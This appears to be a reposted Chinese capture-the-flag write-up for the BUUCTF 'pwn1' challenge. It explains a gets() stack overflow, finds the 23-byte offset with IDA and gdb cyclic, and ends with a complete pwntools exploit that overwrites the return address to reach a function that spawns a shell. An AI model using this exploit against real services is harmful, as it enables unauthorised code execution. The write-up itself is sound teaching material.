Buuctf pwn1 详细wp

Posted luoleqi

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Buuctf pwn1 详细wp相关的知识,希望对你有一定的参考价值。

程序基本信息

技术图片

我们可以看到这是一个64程序,没有保护开启。

程序溢出点

技术图片

gets函数可以读取无限字符,存在栈溢出。
接下来我们测测需要多少字符长度可以溢出。
我们可以直接从ida上看到
技术图片

变量s在栈上[bp-Fh]位置,也就是说我们只能输入(Fh + 8)(覆盖rbp需要8个字节)的字节就能覆盖到栈底rbp,紧跟栈底的便是返回地址,我们可以接上一个我们想要程序跳转到的地址。
当然ida显示大部分情况下栈偏移都是没问题的,但也有例外,所以最好手测一下溢出长度。
ida和gdb都可以测溢出长度,这里我介绍gdb的方法。
首先生成50个每4个字符都是独一无二的字符串
技术图片

然后用gdb调试程序并把该字符串输入
技术图片

我们看到程序运行到ret发生了错误
技术图片

此时栈上的情况
技术图片

我们可以看到,rsp处本来应该是返回地址,现在已经被我们输入的字符串覆盖了。
由于程序是小端法,所以agaa就在0x7fffffffe108处,我们只要知道agaa前有多少字符即可。
技术图片

由于cyclic生成的字符串每四个字符都是唯一的,所以只要我们-l命令输入四个字符,它就能测算出这四个字符前有几个字符。(一个字符占一字节)
可以看到结果为23 = ida显示的Fh + 8

确定返回地址

现在我们已经可以成功劫持rip到我们想要的运行地址,哪要跳转到哪里才能pwn掉程序呢?
我们发现程序有一个函数fun()
技术图片

执行了system("/bin/sh"),/bin/sh是一个软连接,它指向某一个shell,所以这个命令会开启一个shell,将rip劫持到这里,我们就能成功pwn掉程序。

编写exp脚本

直接附上exp

/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch = 'amd64', os = 'linux', timeout = 1)   #初始化上下文环境,主要是系统、架构和读取超时时间

io = remote('pwn.buuoj.cn', 6001)   #此处的IP地址和端口需要根据目标修改

system_addr = 0x401186  #函数fun()的地址

payload = ''                    
payload += 'A'*23           #使用23个任意字符填充
payload += p64(system_addr) #返回地址覆盖为fun函数的地址,当主程序运行完返回时便会跳转到fun()函数并执行

io.sendline(payload)            #向程序输入payload,注意使用sendline()或者send()的数据末尾加上回车'\\n'
io.interactive()

成功getshell

运行脚本成功获得flag
技术图片

以上是关于Buuctf pwn1 详细wp的主要内容,如果未能解决你的问题,请参考以下文章

babyheap_0ctf_2017 详细解析BUUCTF

64位Kali无法顺利执行pwn1问题的解决方案

Pwn_9 作业讲解

[BUUCTF 2018]Online Tool

重邮二进制日天群-pwn1

[BUUCTF 2018]Online Tool